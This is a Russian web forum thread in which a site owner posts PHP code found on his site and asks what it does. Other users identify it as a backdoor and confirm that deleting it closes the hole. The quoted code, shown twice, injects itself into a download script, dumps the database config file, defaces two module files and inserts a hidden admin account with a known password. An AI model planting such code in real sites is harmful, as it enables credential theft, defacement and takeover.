X   Сообщение сайта
(Сообщение закроется через 3 секунды)



 

Здравствуйте, гость ( Вход | Регистрация )

Открыть тему
Тема закрыта
> Shell
fedek
fedek
Topic Starter сообщение 31.5.2010, 17:17; Ответить: fedek
Сообщение #1


Завсегдатай
*****

Группа: Active User
Сообщений: 572
Регистрация: 28.2.2010
Из: Богородск
Поблагодарили: 83 раза
Репутация:   16  


Есть файл, в котором Находится как я понимаю Shell
}

if($_GET['abc']){
$ko = '
if ($_GET[\'abc\']) {echo file_get_contents(\'data/dbconfig.php\');}
if ($_GET[\'drop\']) {$fp = fopen(\'modules/domain_check2.php\',\'w\'); fwrite($fp,\'<? echo"<h1>FUCK YOU</h1>"; ?>\'); fclose($fp); $fp = fopen(\'modules/domain_check.php\',\'w\'); fwrite($fp,\'<? echo"<h1>FUCK YOU</h1>"; ?>\'); fclose($fp);}
if ($_GET[\'sql\']) {$db->query( "INSERT INTO " . PREFIX . "_users (email, password, name, user_group) VALUES (\'admin@admin.ru\', \'".md5(\'000000\')."\', \'Support\', \'1\')" );}
';
$sf = str_replace('<?php',"<?\n".$ko,file_get_contents(ENGINE_DIR.'/download.php'));
$fp = fopen(ENGINE_DIR.'/download.php','w'); fwrite($fp,$sf); fclose($fp);
}

С помощью него человек получает доступ к этому фалу или ко всем данным у меня на хостинге? И если стереть эту часть кода, закроется ли доступ данному человеку к данному файлу и хостингу?

P.S. отвечать строго по теме, не кого не обсуждая!

Сообщение отредактировал fedek - 31.5.2010, 17:18


--------------------
-1
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
777374
777374
сообщение 31.5.2010, 17:24; Ответить: 777374
Сообщение #2


Бывалый
****

Группа: User
Сообщений: 300
Регистрация: 22.9.2008
Из: Internet
Поблагодарили: 33 раза
Репутация:   6  


(fedek @ 31.5.2010, 17:17) *
Есть файл, в котором Находится как я понимаю Shell
}

if($_GET['abc']){
$ko = '
if ($_GET[\'abc\']) {echo file_get_contents(\'data/dbconfig.php\');}
if ($_GET[\'drop\']) {$fp = fopen(\'modules/domain_check2.php\',\'w\'); fwrite($fp,\'<? echo"<h1>FUCK YOU</h1>"; ?>\'); fclose($fp); $fp = fopen(\'modules/domain_check.php\',\'w\'); fwrite($fp,\'<? echo"<h1>FUCK YOU</h1>"; ?>\'); fclose($fp);}
if ($_GET[\'sql\']) {$db->query( "INSERT INTO " . PREFIX . "_users (email, password, name, user_group) VALUES (\'admin@admin.ru\', \'".md5(\'000000\')."\', \'Support\', \'1\')" );}
';
$sf = str_replace('<?php',"<?\n".$ko,file_get_contents(ENGINE_DIR.'/download.php'));
$fp = fopen(ENGINE_DIR.'/download.php','w'); fwrite($fp,$sf); fclose($fp);
}

С помощью него человек получает доступ к этому фалу или ко всем данным у меня на хостинге? И если стереть эту часть кода, закроется ли доступ данному человеку к данному файлу и хостингу?

P.S. отвечать строго по теме, не кого не обсуждая!


этот код делает листинг data/dbconfig.php... etc..
кароч админа ставит в бд mysql


--------------------


Поблагодарили: (1)
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
fedek
fedek
Topic Starter сообщение 31.5.2010, 17:26; Ответить: fedek
Сообщение #3


Завсегдатай
*****

Группа: Active User
Сообщений: 572
Регистрация: 28.2.2010
Из: Богородск
Поблагодарили: 83 раза
Репутация:   16  


этот код делает листинг data/dbconfig.php... etc..
кароч админа ставит в бд mysql

С помощью этого кода кто-то может получить доступ к моим данным(хостингу, БД, К данному файлу)?


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
777374
777374
сообщение 31.5.2010, 17:30; Ответить: 777374
Сообщение #4


Бывалый
****

Группа: User
Сообщений: 300
Регистрация: 22.9.2008
Из: Internet
Поблагодарили: 33 раза
Репутация:   6  


(fedek @ 31.5.2010, 17:26) *
С помощью этого кода кто-то может получить доступ к моим данным(хостингу, БД, К данному файлу)?

DB Only! и некоторым файлам


--------------------


Поблагодарили: (1)
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
fedek
fedek
Topic Starter сообщение 31.5.2010, 17:34; Ответить: fedek
Сообщение #5


Завсегдатай
*****

Группа: Active User
Сообщений: 572
Регистрация: 28.2.2010
Из: Богородск
Поблагодарили: 83 раза
Репутация:   16  


DB Only! и некоторым файлам

Тоесть если я сотру данный код, то злоумышленник не получит доступ к данному файлу и базе данных?


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Electric
Electric
сообщение 31.5.2010, 19:37; Ответить: Electric
Сообщение #6


CMS help/antivirus
******

Группа: Active User
Сообщений: 1532
Регистрация: 27.12.2009
Из: Єдина Україна
Поблагодарили: 389 раз
Репутация:   57  


(fedek @ 31.5.2010, 16:34) *
Тоесть если я сотру данный код, то злоумышленник не получит доступ к данному файлу и базе данных?
Да, но не фак что уже не получили доступ. Кстати это не шелл это бекдор.
Одного не пойму, зачем плодить темы?
http://talk.maulnet.ru/index.php?showtopic=56429


--------------------


Поблагодарили: (1)
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
fedek
fedek
Topic Starter сообщение 31.5.2010, 21:03; Ответить: fedek
Сообщение #7


Завсегдатай
*****

Группа: Active User
Сообщений: 572
Регистрация: 28.2.2010
Из: Богородск
Поблагодарили: 83 раза
Репутация:   16  


Одного не пойму, зачем плодить темы?

Инет лагнул видимо... Можете посмотреть, темы в одно и тоже время созданы...


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Открыть тему
Тема закрыта
1 чел. читают эту тему (гостей: 1, скрытых пользователей: 0)
Пользователей: 0


 



RSS Текстовая версия Сейчас: 15.12.2017, 3:05
Дизайн